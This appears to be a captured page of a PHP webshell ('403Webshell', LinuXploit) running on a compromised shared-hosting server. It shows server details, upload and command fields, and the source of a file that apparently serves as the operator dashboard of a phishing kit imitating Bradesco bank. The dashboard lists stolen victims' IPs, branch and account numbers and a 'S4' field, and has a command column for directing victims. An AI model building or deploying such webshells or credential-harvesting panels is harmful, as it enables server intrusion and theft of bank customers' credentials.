403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.116.28.79
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/sacbradescolivelo/_dashboard2021/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/sacbradescolivelo/_dashboard2021/infos.bkp.php
<?php
require_once 'config.php';
include 'validaLogin.php';
getHeader();
?>
<div class="container-fluid">
<div class="pt-5">
    <?php
        $infos = Info::buscarTodos();
    ?>
    <div class="container-fluid mb-3" style="padding: 0px;">
        <div class="row">
          <div class="col-6">
            <span class="contador"><span id="quantidade"><?php echo count($infos);?></span> Info(s)</span>
            <a href="javascript:;" class="excluirTodos">Excluir Todos</a>
            <a href="javascript:;" class="silenciar">Silenciar</a>
          </div>
          <div class="col-6 text-right pt-1">
            <a id="controlarContador" class="contador" href="">Parar / Iniciar</a>
            <span id="timer" class="contador">Atualizar em: <span id="segundos"></span> segundos</span>
          </div>
        </div>
    </div>
    
    <table id="infos" class="table">
        <thead>
          <tr>
            <th scope="col">#</th>
            <th scope="col">IP</th>
            <th scope="col">Data Hora</th>
            <th scope="col">Agência</th>
            <th scope="col">Conta</th>
            <th scope="col">S4</th>
            <th scope="col">Status</th>
            <th scope="col">Comando</th>
            <th class="text-center" scope="col">Opções</th>
          </tr>
        </thead>
        <tbody>
  

        </tbody>
        
      </table>

</div>
</div>
<audio id="myAudioNovaInfo" loop>
  <source src="myAudioNovaInfo.mp3" type="audio/mpeg">
</audio>
<audio id="myAudioAlteracaoInfo">
  <source src="myAudioAlteracaoInfo.mp3" type="audio/mpeg">
</audio>
<?php
getFooter(['js/infos.js']);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit